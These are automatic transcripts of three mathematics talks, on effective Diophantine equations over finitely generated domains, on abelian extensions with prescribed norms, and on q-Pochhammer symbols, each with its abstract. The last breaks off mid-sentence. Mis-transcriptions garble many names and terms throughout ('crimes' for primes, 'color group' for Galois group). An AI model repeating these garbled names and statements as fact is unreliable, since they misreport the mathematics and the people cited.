the grand ring is the ring of S integer and brings a band further, consider the equation over a class of finite generated domain. In this proof, Bezsch's method was involved. Later, Michales proved this conjecture over Z with a different method and algebraic method. Three years ago, Koimans proved the following general result. If A is an effectively given finite generated domain, then this Catalan equation has only finitely many solutions and he proved this in an effective and quantitative form. Discriminante equation. Sorry, let again A and K be as a group denoted by a finite extension of K and let D be an non-zero element of A. Many different problems can be reduced to this discriminant equation of this form where the unknowns are monic polynomials having this property. We say that these polynomials where A is an element of capital A are called A equivalent. In this case, it is easy to see that they had the same discriminant. In effect, the finite generated result have been obtained over Z for polynomials of the great forms by Gielonia and Nagel. Later, it was proved in full generality that if we assume that A is integrally closed in K, then this equation D1 has only finitely many A equivalence classes of solutions. This equation, this result has several consequences. For example, if L is a finite extension of K and A L is an integral closure of A in L, then we consider this equation in element this time in the element of A L. We say that alpha and alpha plus A in A L are set to be A equivalent. In this case, they have the same discriminant. From the above result, it follows that up to A equivalence, this equation D2 has only finitely many solution in the elements of A L. Sorry, excuse me. So, this constant equation D2, this is the next equation. Consider this equation A L equals A alpha where the unknown belongs to A L. This is equivalent to the fact that one alpha and some is a power integral basis of A L over A. If alpha is a solution of this equation, then so is epsilon alpha plus A, where epsilon is a unit in A and alpha is an element of A. Again, from this theorem concerning polynomial, it follows that up to multiplication by elements of A star and translation by elements of A star by A, there are only finitely many alpha with this property, that is there are only finitely many power integral basis. The method of proof, first one can reduce the equation D1 to unit equation and then D2 to the equation D1 and finally D3 to equation D2. Effective finiteness result concerning equation D1, D2 and D3. The first result, effective result over Z and over number fields were obtained in the 70s. The method of proof was to reduce the equation to unit equation and use the Eker's method. The general case, let again A be a finite generated domain which can contain transcendental elements to create quotient field L, a finite extension of K. We say that L is given effectively if an irreducible P with coefficients in K is given such that this isomorphic holds. We prove with the lecture the following theorem. Assume that A is integrally closed, then up to A equivalence, equation D1, that is the equation concerning polynomial, has only finitely many solutions. This was already proved before. Further, if A, L and D are given, all solutions can be determined effectively. The second part, the effective part was U. The condition that A is integrally closed can be weakened to the fact that this factor group is finite. This can be decidable. Where AK is the integral closure of A in K and A plus is the additive group of A. Similar result, they were obtained for equation D2 and D3 under some additional conditions. The method of proof was again to reduce the problem to unit equation in L and use general theorem B on unit equation and combine it with some effective linear algebra. The second part will be devoted to new result obtained together with A-Vertsai. Decomposable for coefficients are of basic importance in the Ofanty-Number theory. Let again A, K and K-bar be s-able. By definition, a polynomial from this polynomial ring is called decomposable from if it factorizes into linear factors, say L1, Ln over K-bar. Assume that at least three of them are pairwise linearly independent. An equation of this form is called decomposable form equation over A. For M equals 2, this is just a QA equation. Further important classes of decomposable form equations are non-form equations, discriminant form equations and index form equations. A non-form equation is now our equation of this form where the norm denotes the norm of this linear form, more precisely the product of the conjugates of this element. Where we might assume that alpha 1 equals 1 and the other elements are contained in K-bar. Discriminant form equation. In this case, we consider this linear form and we take the discriminant of this and we can assume for simplicity that 1, alpha 1 and so on are linearly independent elements from K-bar. In this case, this is called a discriminant form with coefficients in K. Several general ineffective finiteness results have been obtained on equations decomposable form equations, discriminant form equation and norm form equation. First of all, I have to mention here the famous result of Paul Gung-Schmidt from 1971. He proved for norm form equation over Z, a finite criterion and in addition he described the set of solutions by showing that all the solutions belong to finiteness in many so-called family of solutions. Later, Schlichkeweig extended this to the case that the ground ring is the ring of acid integer in the rational field and in the proof they use the subspace theorem and its periodic version. Over finite generated domains, several results were obtained for decomposable form equation, discriminant form equation, index form equation under certain extension on these forms and on A on the ground domain. The method of proof was to reduce the problems to unit equations in two unknowns and use length theorem. The next theorem will be proved in full generative over arbitrary finite generated domains. Loran in 1984 gave a finite criterion for norm form equations. We proved the version in 1988 for decomposable form equations and norm form equations, a finite criterion and in 1983 Schmitz theorem was generalized to the case of decomposable form equation over finite generated domain which states that in this case the set of solution belongs to finiteness in many so-called family of solutions. It is important to note that in this case if one to reduce the problem you can do but only to multivariate unit equations and as is known in this case such an equation, unit equation, has also finitely many solutions but only for solution non-generated solution such that the corresponding equation has no vanishing substance. Effective finiteness result over number fields for discriminant form equation this result was obtained over Z, O, K and O, S and in 1978 with PAP for decomposable form equations and non-form equation under certain excision on F and also because method were used and over excision plus of finite generated domains some effective finiteness result were obtained under certain excision on the form and on the grand domain. Here already the effective specialization method was used. Consider again A and K as above let F be a decomposable form which factorizes into linear form say L1, An, Ln over K bar and consider this decomposable form equation. Denoted by Lf the set of linear factors and suppose that this has at least three power wise linearly independent linear forms. Further to simplify the presentation we assume that the rank of Lf equals M. So in fact I restrict myself here to a special case definition. Following PAP and myself we consider this graph which is called triangular graph whose vertex system is Lf and in which Li and Lg are connected by an edge if Li and Lg are either linearly dependent or linearly dependent but there is a relation of this form with appropriate lambda i and so on. To state the quantitative result we have to generalize the size of elements of alpha to the case when the elements are algebraic over K definition. For an algebraic element over K we denote by the K alpha the degree of alpha over K. Further a couple of representatives for alpha is a topo where the entries belong to this polynomial ring is such that this is the monic minimal polynomial of alpha over K. We say that the degree of this topo is at most day and the logarithmic height is at most age. If the entries has degree at least d and the height of them is at most age for every i. We need another definition. Consider a topo in A to Bm. A representative for X is a topo X tilde with entries from this polynomial ring such that this holds for i equals 1 to m. Then the size of X tilde is defined as the maximum of the sizes of the entries. The following theorem says that if we suppose that the following condition holds gl of g that is the graph that is connected the generators f1, fd of i have degree at least d and logarithmic height at most age. B and the coefficients of l1, ln have tuples of representatives of degree at most day and logarithmic height at most age. If the coefficients of l1, ln have degree at most capital D over K, then every solution X of df1 that is of this equation has a representative X tilde from this polynomial ring such that the size of X tilde can be estimated from above by an expression of this type. Here the constant implied by big O is an effective absolute constant. This theorem is effective, quantitative and has many applications I would like to present you some of them. Definition. A finite extension l of K is effectively given if it is given in this form where P is an effectively given monarchy reducible polynomial from this polynomial ring. In that case l can be written in this form and then every element of l can be written in this way where the coefficients belong to K. In this case we say that beta in l is given respectively can be determined effectively if these coefficients are given or can be determined effectively. The above theorem implies the following consequences for this equation. Corem g. If this graph is connected then equation df1 has only finitely many solutions. Moreover, if the coefficients of l1, ln belong to a finite extension l of K and if a K lb and the coefficients of l1, ln are given effectively then all solution can be effectively determined. The method of proof for theorems i and j is as follows. Following your argument introduced by POP and using the connectedness of this graph we can reuse this equation to a finite system of unit equation over a finite generated overring a prime of a in l. Then we can apply the effective theorem b or respectively b prime on unit equation and utilize the so-called degree height estimates which is new in this generality. The theorem i and g imply for m equals to theorem d that is the result of Belsch events and myself on to equation. It should be mentioned that in fact we proved more. We have a more general version of the result presented above. It is not necessary that r of j of lf is not necessarily connected and that it is allowed that the rank is not necessarily m. It can be smaller than m. In fact it is interesting to mention that in case of discriminant equation and decomposable form equation we did not use effective specialization. In fact we reduced the equation to unit equation for which we had already effective results which were obtained by means of effective specialization. In fact we have two methods. The first one the effective specialization method. We can reduce the equation to the function field case and number field case and use effective specialization to get final analysis in an effective form. Another method if possible we reduce the equation to unit equation to which it is already proved the final is in an effective form and then we can reduce again the final is in an effective form. In fact apart from the Schindler-Teydenmann equation and the Katalan equation we can apply both methods to all these equations. Consequences of CRM-I. First for non-form equation. Consider the non-form equation in this form. From the more general version of CRM-G, this is the final analysis, one can prove that if we assume that alpha m is of degree at least three over this subfield, in fact the subfield of this between field, the equation nf has only final and many solutions with this property. Further if a, k, r, alpha 1, alpha m and b are effectively given then all solutions of nf with this property can be effectively determined. In fact we prove this in a quantitative form. This was already proved with the finalist part in 82 and for restricting class for 83 in an effective form. Here that is this equation has degree at least three and the assumption that x and is non-zero are necessary otherwise if we doveten then we cannot get the finalist result. As to discriminant form equation, consider again this discriminant equation, discriminant form equation in this form. Then CRM-G imply the following. Under the overall assumption concerning this equation, equation nf2 has only finite many solutions. Moreover if a, k, r, alpha 1 and so are effectively given then all solution of this equation can be effectively determined. Plus we gave a quantitative version. The first finalists results already proved in 82 and the second for restricting class for 83. This has some application to index form equations and integral elements of given discriminant. I should mention that we consider also more general version of this equation, the composable form equation, non-form and discriminant form equation to the case where on the right hand side we replace b with b times a unit where the unit is also unknown. Such generalization is useful for example to get the general result on simpler ring extensions of a. Finally I should mention that many applications of CRM-B to r have been obtained from these and from the more general versions. To finish my talk I should mention that our general effective method provides a general program. Given a polynomial p of x equals 0 in x in a to the m. If we have effective finiteness result for the s-integral solutions of the corresponding equation over a number fields and effective results over function fields of characteristic zero, our method gives an effective finiteness result for equation star. Plus we can get quantitative version if we have quantitative version for the number for the general function fields. Thank you for your attention.
|
In the 1980’s we developed an effective specialization method and used it to prove effective finiteness theorems for Thue equations, decomposable form equations and discriminant equations over a restricted class of finitely generated domains (FGD’s) over Z which may contain not only algebraic but also transcendental elements. In 2013 we refined with Evertse the method and combined it with an effective result of Aschenbrenner (2004) concerning ideal membership in polynomial rings over Z to establish effective results over arbitrary FGD’s over Z. By means of our method general effective finiteness theorems have been obtained in quantitative form for several classical Diophantine equations over arbitrary FGD’s, including unit equations, discriminant equations (Evertse and Gyory, 2013, 2017), Thue equations, hyper- and superelliptic equations, the Schinzel–Tijdeman equation (Bérczes, Evertse and Gyory, 2014), generalized unit equations (Bérczes, 2015), and the Catalan equation (Koymans, 2015). In the first part of the talk we shall briefly survey these results. Recently we proved with Evertse effective finiteness theorems in quantitative form for norm form equations, discriminant form equations and more generally for decomposable form equations over arbitrary FGD’s. In the second part, these new results will be presented. Some applications will also be discussed.
|
10.5446/53726 (DOI)
|
Okay, yeah, thank you very much for inviting me to Illumini, even though it's only virtual this year, but things will get better again, I hope. So yeah, I'm going to talk about joint work with Rudolf Christian from UCL. And yeah, originally I was planning to do a Blackboard talk on my drawing tablet, but I found out that I'm not fast enough at writing a lege- lege-ably to give a talk in this way, so I've prepared my slides. They're still handwritten, but I've prepared them at once. I hope they're somewhat legible. Okay, so if you're given an extension of number fields, k over little k on degree n, then of course there is the field theoretic norm map from k to little k. And then if you fix the basis omega 1 to omega n of your extension, then you can write the norm map in this basis. This is a polynomial with coefficients exponent to xm, and it's from a genus of degree n. And such a polynomial is called the norm form, or that's what I call the norm form today. And given such a norm form from a number field, or from an extension of number fields, and a number, alpha, an element of the small number field, then you can look at norm form equations where you say n of x1 takes n as alpha. So norm of x1 omega 1 plus x1 of x omega n should be alpha. Now, these are very classical objects. Two kinds of questions at least have been studied extensively. First is given an alpha and a number field k, given your norm form, then you study solutions, other solutions, and so on. Secondly, given just a number field k, then when also people have also studied the set of alpha for which this equation has a solution, for example, there's some topics for a large system, so in this talk, in this project, we were looking at this sort of from the other way around. We start with elements of a small number field with k, and what we study are extensions such that all of these alphas are norms from the large field. So it's sometimes the opposite problem to these questions about here. We don't fix the elements, we fix the elements that should be norms, and we vary the extension field. And for example, one can put some restrictions on k to k, and fix the degree. One can only look at extensions of a given degree, and for example, if you get in color group, and one could also say that the local extension at certain, probably finite in many places should also be prescribed. So that's the kind of problems that I'm looking at. Let me show you a very simple example of this. So I want to find an Sn extension of q with prescribed normal alpha. So a number field of degree n whose color group of a normal closure is the full Sn, and alpha should be known from this field. I can do this by just writing down a generic polynomial, x to the n plus a n minus 1 x to the n minus 1 and so on, for which the constant coefficient is the corrective scale alpha. And then I just choose my polynomials a n minus 1 up to a 1, sufficiently generic so that it was a reducibility theorem guarantees that this polynomial is color group Sn or q. And then I just take k as my number field generated by a root of this polynomial. Then it's an Sn extension. And just by the way in which this polynomial was constructed alpha is a norm, namely the norm of this element beta, because it's here constantly efficient with the right sign. So that was easy. And that's the situation for Sn extensions. What I really want to talk about is the polar opposite of Sn extensions, that's a billion extensions. The color groups are as small as possible, as simple as possible, given the first degree. So from now on, I fix my number field with k, and I fix a finite a billion group g, this should be the color group of my extension. And I also fix a set a of elements of 1 up to alpha t of little k, that should be norms from the extension. So the first result that I want to present to you is this one. That's due to myself, then Lafren and Richard. It's pretty recent. And it counts extensions k that are obedient with color group g, such that all these alphas, all these elements of a are norms from from k to k. And it counts them with respect to a quantity called the conductor. So this is this phi of k over k. So that's the absolute norm of the conductor of my extension, and this should be bounded by b. So that's the counting function of g extensions of little k, in which all alphas are norms, and whose conductor is bounded by b. It's well known that given any bound b, then there are only finitely many g extensions with conductor bounded by b, and we are counting a part of them. And this counting function behaves like a constant, times b times half the logarithm of b, all of this can be very explicit. So c is a positive constant. One could also write this constant non-explicitly, but it's okay. And this exponent here, this phi, has a very nice form. It's the sum over all elements of the group. One divided by the degree of the field extension, kg over k, where g, this is the order of this group element g, and kg or kd for any d is this number field that you get by joining to little k, the d-thruits of unity, and d-thruits of all these elements alpha that you want to make norms. Okay. So this constant here is positive. So in particular, our theorem has the corollary that such extensions always exist. So that's the corollary here. Given any number field k, any finite beginning group g, and any finite set of elements of k, then there is an extension, capital K, with color group g, such that all these elements are norms. As far as we know, that was new. But it's a corollary of a density result. And in particular, it's not quite clear how do you actually construct such an extension. Not that they exist, we know that they're infinite. Many can count them, but it's not clear how to construct them. And that's what I worked out with Udo Fischer. So we found the constructive proof of this corollary. Since it's about a billion extensions, this uses class-fit theory. So in my talk, I was planning to explain this construction to you. And in the end, to show you an example. So here is a summary of the facts from classical theory that I'm going to use. It says that extensions k, capital K of little k, together with an isomorphism from the Galois group to our prescribed group g. So these pairs of extension plus an isomorphism are parametrized one-to-one by some other sets. And these are continuous and subjective homomorphisms from the ideal class group of my number here, little k, to my group g. So it should be subjective and continuous. The topology is not going to play a role in this talk, so you can forget about this continuous if you want. So the ideal group here, this i k, put them down in a definition here. It's a restricted product over all places of my number field. And then it's the local field at this place. So that's a restricted product. This means that an element of this is a unit, a local unit in obi star at almost all places. Yeah. So that's the ideal group. And then k star, so the unit group of k embeds naturally in this just by mapping it to a copy of k star in each vector. And then you can mod it out. So if I've written down this parameter section again, so pairs of extensions capital K of little k together with an isomorphism of the Galer group to G parameterized studies, subjective, continuous morphisms fee. And then there is also a normal map from the idles of capital K to the idles of small k. Sorry, forget about this star here. Maybe I can. Yeah. So this shouldn't be a disaster. Okay, so how does this go? You take an idle of the big field, the local components of the w for w place, and you map it to the idle with local components that plays V. So these place of small k, the local component that we is the product over all of the places w of capital K extending your place and send you take the local norm of the course corner there. So that's the moment it does and extends the field theoretic norm. And then another important fact from cluster theory is this one. So if fee corresponds to my extension K, then the kernel of fee is the norms of the idles of K. So that's how you can detect norms using a cluster theory. And of course, it's all module little k. So this is good news and bad news. The good news for our problem is that the cluster theory is very good at detecting norms or to be more precise, everywhere local norms. So that's just elements in here that are norms of idles. And on the other hand, since everything happens modular, the actual global field that you're interested in, the bad news is that cluster theory is not good at detecting global norms because everything that's global is getting modded out. So to me the global norms, global norms are just norms from K. So that's the elements that I'm interested in. And here I have my everywhere local norms. So those are elements of little k that are maybe not norms of elements of capital K, but at least they are norms of idles in this way. And clearly everything that's a norm from an element is the norm of an idler. So we have this inclusion here. So how we can go about still detecting global norms is by something called the Hassan norm principle. So we say that our extension capital K, little k satisfies the Hassan norm principle if the following holds. So if we have equality here, if the global norms are not only contained in the everywhere local norms, but if they're equal to them. And that's good because if the extension turns out to satisfy the Hassan norm principle, then we can again apply our classical theory to detect global norms just going via everywhere local norms. So here are two classical results to Hassan norm principle. The first is that it holds for cyclic extensions. So whenever capital K or little k is a normal extension whose color group is cyclic, then it satisfies the Hassan norm principle. So we always have equality here. And again, the bad news is that for the simplest non-cyclic extensions, which are bicotrategic ones, so color group set two times set two, there are already counter examples. So this one is just due to Hassan, to join this color group minus 3 and 13 to Q, then this extension does not satisfy the Hassan norm principle. Just because it fits in, here is another result from my paper with Den-Lachran and Rachel Newton. It says that if you fix an abelian regular group, then 100% of all G extensions of little k satisfy the Hassan norm principle. So by 100%, I mean natural density 1 if you order them by this absolute norm of the conductor. You don't necessarily have to count number of years by a conductor. I mean the conductor is really nice invariant to count the beating extension. But another maybe from some perspective more natural invariant to count number fields by would be the discriminant. And turns out that when you count by discriminant, then things are more complicated. Then this is actually not true for many groups G. Okay, that's just an aside. Good, so we have to Hassan norm principle. Kate has formulated a powerful criterion for when the Hassan norm principle holds for an extension k over k that is normal. So I write G for the regular group of k over k and Gv for the decomposition group at the place B. So that's just the color group of a corresponding local extension for any place W, along above V, all of these are economically as more. So it doesn't matter which W you choose. And then on the right hand side here, this object is called the knot group of the extension capital K or little k. And it is everywhere local norms. So those elements of little k that are norms of sorry, this should be an IK. Can fix this. So elements of little k that are norms of adults and you mod out the global norms. And this this object is so Tate has shown that this is isomorphic to the kernel of a map between the chronology groups. So you have the third chronology of G, so third color of chronology of K over K. And you go to the product over all places of little k to the third chronology of these decomposition groups by the restriction. The car of this is as a more thick to the not group. So to satisfy the house and non principle means that this group is zero. So in other words, your extension or extension K over K satisfies the non principle. If and only this map here is injective. This is already so we already use this in the paper with them locker and Richard Newton in the following dual form. So you just take the dual of this map. So then this goes from some over the exterior square of the decomposition group to the exterior square of G. And it should be such active. So this this form was actually heavily used in this paper with them and Richard. Because I mean this. This is this is quite explicit. And. Yeah, I mean it's easy to apply. So so we have to start here and for the house and all principle. And now we're going to apply it. So this we need to see how how class theory detects these decomposition groups here. So I'm explaining this here. So if my extension is given by this subject different more efficient fee from the other class group to G and these any place, then I can look at fee V. And fee V just composes fee with the embedding of my local field into the last group. And then this decomposition group GV. As a subgroup of G will just be the image of this map TV. So everything fits together very nicely. Give all this. I can now formulate the goal of this construction. So which kinds of homomorphisms are we going to find. We want to construct homomorphisms fee such that. At all places. These elements are for one after T, which I want to be norms should be in the kernel of this local map. Fee. Okay. So what does this tell me this tells me that all the alphas everywhere local norms. If you remember from earlier, I've shown you that the kernel of the global map fee corresponds to the same holds for local class theory as well. So this first condition here says that all the elements offer. And the second condition is the one that we get from. It says that. The natural map going from the direct sum of these. The square of the images of TV, because images of TV adjust the decision groups. So we looked out here. To the exterior square of G, they should be such active. And then this condition. ensures that there has no principles. So taking these two together. We see that all these alphas then will not only be local norms, but they will in fact be global norms as desired. So now we construct such homomorphism fee that have these two properties. So it's, it's not a problem to do both this over arbitrary based on the fields a little k. But it's just notationally easier to do it over Q. So for now, I'm going to restrict to to indicate it was Q for this presentation. And similarly, I'm going to restrict the group G to be of this form set mode ease that to some power our. So you can go from these special G's to general being groups just by taking it to be the exponent and then you then you can reduce to the case of these groups G. And you just have to use some one occasion to get rid of this restriction that little case Q gets a bit more complicated because as usual, infinite unit group makes problems and. Well, not really cross group also creates some problems, but it's it's sort of well known how to deal with this. Okay, so now if little case Q, then one can describe this be that last group, quite simply in in more concrete way. And it's group of positive real numbers times the units of set hat, so the proof and closure of set. So if written here, what this is or how I see it. So units of set hat is the product of all primes. And then take the local units. So, P I units set P. Okay. Now, I'm going to construct these homomorphisms from units of set head to G. And then of course one can extend it trivially to this sector to get them up from either close group to G. So we've reduced to finding such a homomorphism set head start to G, still satisfying our two priorities. How am I going to do this? I need some crimes. He wanted to PR. So this are here is is this are. So we set the rank of G. Okay. So our primes that are all congruent one month. So he was the exponent of G. Such that my elements of that are going to be norms are local units of these primes. And moreover, if you reduce them, not PI, then there should be if powers in the rest of the field. So all of these conditions are Chebotaric type. So Chebotaric density theorem guarantees that there are infinitely many such primes. And if you take effective versions of Chebotaric's theorem, then you can also see how long you need to search if you're really unlucky, but you will find such primes. Okay. So I'm feeling these primes. I have everything that I need to write down the first version of this. So it goes from set hat star. Remember this was the product over set P star for all primes P. And I just ignore all the factors at all primes P except for my primes PI. And I just ignore all the other factors, so it goes to this finite product over set PI star. And then in each component, I can reduce my PI. They go to the final product from one to R to the residue fields, FPI star. And then I reduce some more. So here I've gotten something. I go to, in each factor again, to FPI star mod ETH powers. So since PI was congruent to one mod E, FPI star is a circuit group of all the divisible by E. So if I take it modulate ETH powers, then it's a circuit group of all the E. And therefore, this product here is as more effective set mod ETH to the R, which was our group G. Okay. So I have constructed this homomorphism fee from set hat star to G. It's obviously subjective because each of the components is subjective. And also, all the alpha is in the kernel of this map because I've chosen my crimes in such a way that they are ETH powers in these FPI star. So here, from here on, they are zero. Yeah. Okay. So what does this give me? I have this subjective map. This gives me an extension with a group G of Q. So G extension Q of Q. And all the alphas are norms of idles. So everywhere local norms. So what's missing is how I make them grow the norms where it has a non-principle. So now I need to take a look at how to implement this second part here. Feeds criterion for the has a norm principle. Okay. So how can I ensure that there has a norm principle holds? I need to use some more price. First of all. So this set of insert to the R. This was our group G. So lambda number two, the exterior square of G appears and the exterior square of such an R power. I mean, I've written it down here what it is. So you take E1 up to ER, the standard basis of set of insert to the R. And then you you wedge any two of them together and take the set of insert module generated by that. And this gives you the exterior square of set of insert to the R. So these, these here are our basis. Okay. So now instead of taking just R primes. I now need to take R over two pairs of primes, PL, QL that satisfy the same properties as above for now. So they should be congruent one E and all of my alphas, all of the elements that are going to be norms should be if powers, not PL and if powers, not QL. Yeah. And such pairs PL QL. Then I start by constructing homomorphism to call fee prime in exactly the same way as before. So I go from set hat to the set star. To the components of PL QL, then I go to the residue field and then I reduce module if powers. So I end up here at the product over L from one up to M, FPL star, not FPL star if powers times FQL star, not FQL star if powers. And then again, each of these vectors is set of E set. So here I have set of E set squared. So I have M copies of set of E set squared. And I call this G prime for now. And now, so about this here, I'm going to say a little bit later on, so that's sort of the most technical part of our construction. We now find the basis F1, F1 prime up to FM, FM prime, so two M basis elements of this G prime. That has the property that each FL, FL prime is the basis of the image of the local field of FPL star for all F. So let's just assume that we are able to find such a basis for now. Then I construct a second map of C and this goes now from G prime to a group G. And the way in which we do this is I take all pairs of elements of my standard basis of set of M basis to the R, enumerate them in some way. So I have these M pairs and then the pair FL, FL prime from this basis up here. So this pair FL, FL prime, which forms the basis of C prime of KPL star. This should go to the Lth pair, EI, EJ in this enumeration. Okay, so it's defined on the basis of G prime, so that's completely fine. This is a checkered. What am I going to do with that? I define my phi, so that's the enumorphism that I want to construct that I'm interested in. And I have the log composition of these two. So we go from set hat star first to G prime and then to G. And then since both of these components are subjective, the whole thing is subjective and we still have this property that phi of all the alpha j's is zero for all my j's. Because if you look back at phi prime, then phi prime goes here to PL, not FL to the ETH powers and QL, FQL, not FQL to the ETH powers. And my primes PL and QL virtues in such a way that all alphas are ETH powers. So again, from here on, the alphas are zero. Okay, so we have still preserved this condition that we had previously, but now we have way more factors and we can use these factors to make the Asana principle work. So if you look at the exterior square of phi of some local factor KPL at prime PL. So phi of KPL is C of phi prime of KPL and the basis of phi prime of KPL are these FL and FL prime. So the exterior square of phi of KPL is the cyclic of order E and here is the basis element. But now we constructed this C map in exactly such a way that this FL, FL prime goes to EIEJ. Or for a pair EIEJ of basis elements of G. So that's how we constructed the map here. So if I take now the sum over all my pairs of primes PL, QL from one up to M of the exterior squares of the image of KPL, then this covers my exterior square of G because that's just the direct sum of all cyclic factors of this form. Okay so we have guaranteed that the Asana principle holds. I had this assumption earlier that we are able to find a basis of G prime such that each FL, FL prime is the basis of phi prime of KPL star. So now I should justify how we can achieve this. And to do so, we first need to see how we can identify this local field KPL star inside of our domain set hat star. So that's a local field. So it's a copy of the local units set field star times powers of a uniformizer because PL is a uniformizer. So it's clear how set PL star maps into set hat because set hat star was just a product over all these set P star and PL is one of these factors. So I just map set PL star to the PL factor here. And for this uniformizer PL itself, so this does not appear in any of these factors. But I can move it around a little bit because so this set hat star, this is supposed to stand for the ideal class group of Q. And in the ideal class group, everything is modular Q star. So I can multiply this for example by, well, PL inverse and then this here. So PL inverse, PL inverse and one as the PL factor, PL inverse and so on. So this is the same element as one and so on to PL one and so on. One in the ideal class group of Q. Okay. But this, this representation actually gives me, gives me this element as an element of set hat star. So that's what I'm mapping this to. And then essentially what I have to do to ensure that I can find such a basis is to choose my prime QL in this pair PL QL in such a way that X to the E minus PL is irreducible over F QL. And of course, that's again a Chebotariff condition. So once I have this, this map is subjective. So what's this map? We go now from KPS star and we embed it into set hat star in the way that I've explained here. And then I, I just go directly to the factors of P and Q to the local fields and to the local fields modular ETH powers. Yeah. So now the, this here is hit by this set PL star factor. And here this condition that X to the E minus PL is irreducible over F QL. This guarantees that this is generated by the image of PL itself. And therefore we are, we are subjective up to here. And by the way, I chose my crimes. This is again, as a more specific set, what is that? Okay. So what I've shown here is that the prime of KPL star is as more specific to set EZ square. So it has a basis consisting of two elements, FL and FL prime. And then what I need to make sure is that these basis elements fit well together. So they actually build a basis of G prime. And we do this in the paper using an inductive process, which is not, not terribly complicated, but maybe a bit too much to explain if you're on slides. So I won't say anything more about this, but that's in principle how it works. So let me remark that everything that I've told you so far, I mean, it may look slightly abstract, but everything is very concrete and can be implemented on a computer. And we have done so in a, so we have not really implemented it in sage in the form of a package. But we have say to actually it's in the tree, just can enter our data and then combine it with some computations by hand, we can get results. So let me show you an example here. Just a look at this out today during the metric. So I want to find a field K that's a billion over Q with color group seven or two sets cubed. So I want to find a tri-potratic field and one to to be a norm from this field. So my rank here is three, which means that I need three or two, so three pairs of primes to QL. And these pairs of primes, they should satisfy these various conditions that we've discussed. So here are the primes, so 17, 41, 73, 113, and 89, and 97. So that's P1, Q1, P2, Q3, Q3, Q3. And well, so that's the homomorphism specifying by X and Mk. Now, this is very explicit and concrete. You can read off the conductor of this if you think about it a little bit. And together with some data that comes from the construction of this, one can also read off the splitting primes. So this is a list of the first few primes that split in this extension. And then of course, if you do constructive Gaussian theory, then knowing the conductor and knowing and being able to generate all these split primes is enough to give you equations for your field. I mean, that's implemented in Magma, for example. And in this particular case, Magma took maybe a second or two to compute this concrete representation of the field. OK, I think that's all I wanted to say here. Thank you.
|
Let K be a number field, (alpha) α1,...,αt∈K and G a finite abelian group. We explain how to construct explicitly a normal extension L of K with Galois group G, such that all of the elements αi are norms of elements of L. The construction is based on class field theory and a recent formulation of Tate’s criterion for the validity of the Hasse norm principle.
|
10.5446/53730 (DOI)
|
Thank you. Thanks for the opportunity to talk about this topic during this week. So the main object of this topic is something called QPore Hammer Symbols. So first I have to introduce what it is. So the Po-Harmor Symbol is just a short name for something which is a convenient way to denote things in combinatorics and binomial coefficient. So I'm not at all an expert on combinatorics, but I need to introduce a name because that's an important. So the quantity which will be interesting for us is not exactly this one, but a Q variant, Q analog, which is the following one. So A and Q are complex numbers. And then the notation in combinatorics is the following one. There won't be much combinatorics in our work. It would be a good complex analysis and this kind of thing. But let's see. So this is the quantities. So there are many identities and generalization of binomial coefficients, which makes sense when you replace formally the Po-Harmor Symbol by Q Po-Harmor Symbols. Some formulas remain true. More precisely, what the things which would be recurrent in this talk is this one. When you set A equals to Q, so then we forget about the A. So Qn will be when we set A equals to Q. So it's the product of the one, the powers 1 minus Q to 1 minus Q to the n. So here n is an integer greater than or equal to 0. If n is 0, this product is empty. It's equal to 1. Okay. And Q can be anything. So why are people interested in this? So there are many reasons. I will quote the four connected ones. So it appears in partition-related appears. Okay. My handwriting usually is bad. No, it's even worse. It appears if you country the word, please, then if it appears in partition-related generating series. So I will quote some. So of course, there is a partition function. The number of ways to write an integer as a sum of positive integer. So it's denoted P of n. And this generating series is nothing else then. So it's easy to see if you group all the components of the sum together. It's an integrated product. And this is just you can denote formally by, so it's just Qn, but then you take the limit as n tends to infinity. So here Q has to be of modulus less than 1 for this formula to make sense. And this product is useful because so for instance, you can obtain a hardier management. Okay. The theorem on the asymptotic formula for P of n by exploiting the polar behavior of this product on the unit circle. There are many works in finding identities. Works. I'm finding identities between two series. It's a big business. I will quote one, which is called the Rogers Manusen identity. Which is the following. So if you take this summation, it's Q to the n squared divided by this symbol that we had before, then it's equal to the product resembling also interving the Q-PoH symbol, but this one extended to infinity. So now I need to use the other notation with the A. It's a product like this one, but restricted with congruence condition on R mod Q, mod 5. Q to the 4, Q to the 5. Okay. Another interesting is that it's connected to the connected to a particular module of form. So it's a function eta defined on the upper half plane. Okay. This is z of imaginary part, because in zero, which is so E of z over 24 times the power symbol extended to infinity. And E of z here is the one periodic e to the 2 pi i z, the one periodic exponential function. So saying that this function is a modular form, yes. So imaginary part of that is positive. So this number is of modules strictly less than one. So this makes sense. And saying that it's a modular form for this specific function means that it satisfies some identities. So because of course this is one invariant, when you shift z by one, you will just have a factor coming out, which is E of 1 over 24 times eta of z. And eta of minus 1 over z is z over i to the one half. So z over i has real part positive. So you take the principle determination of the logarithm times eta of z. So, okay. So closer to what I discussed today, there has been another line of research that was devoted to study sine products. So this is understanding the size as a complex number. The size and distribution of values of the programmer symbol when the modulus of q is one. Okay, so when this happens, of course, we have that this thing has modulus between 0 and 2. And note that, okay, so I use this. And, okay, so I recall the definition. This is the product from r from 1 to n of 1 minus q to the r. So if you try to imagine this as some kind of free man sum for function, you can, we noticed that the integral between 0 and 1, if you imagine that all these powers at q is a number, a typical number of the unit circle, then all these powers will become uniformly distributed. When you take the logarithm of this, you notice that the modulus, the nodule I tend to compensate each other. So because this holds, there is a lot of consolation you expect that for typical q, at least some consolation happened in this product. So the size of this product relates to the secondary terms in this human sum approximation. So this is a fact that makes this problem, tends to make this problem somewhat difficult. So I mentioned some names. So there is our works of Erdos and Seckeres, like the 50s, I think, followed by work of Södler, the 60s. So for instance, one of their theorems, the theorem of Södler, I think, is the fact that if you fix an n and you compute the maximum of this symbol on the circle, then this is exponential. There is a constant such that this relation holds. So it's n to some power times an exponential growing. So k is some constant. So I mentioned some further names. So Lubinski has studied this problem. And for instance, one of the theorems that he proved is that for a typical q on the for the bag almost all q on the unit circle, the size is actually much less than this. It's not exponentially than it's o of log n to the one plus epsilon for any epsilon. And for q, just one, q almost everywhere for the bag measure on the unit circle. One further work, which is, so this is 1990. Some further very recent work, very nice theorems. This has been revived very recently by Krebsstadt, several others, so Krebsstadt. Sorry, I apologize for this. A captain book, which are in the Norwegian, I think, and I'm going to learn from Linz. And then some two or three works with two or three of all three of these people, then followed by further work, joint is asked this late now. Christopher is now a new plastic now. And the theory of Paulos from Gratz and Benz border. So for deterministic, they studied deterministic q, fixed q, deterministic is a bit over. And especially for q equals the exponential. So on the unit circle with the angle, which is quadratic. A quadratic number. So for instance, what a theorem of Krebsstadt, a captain book and name is the following from 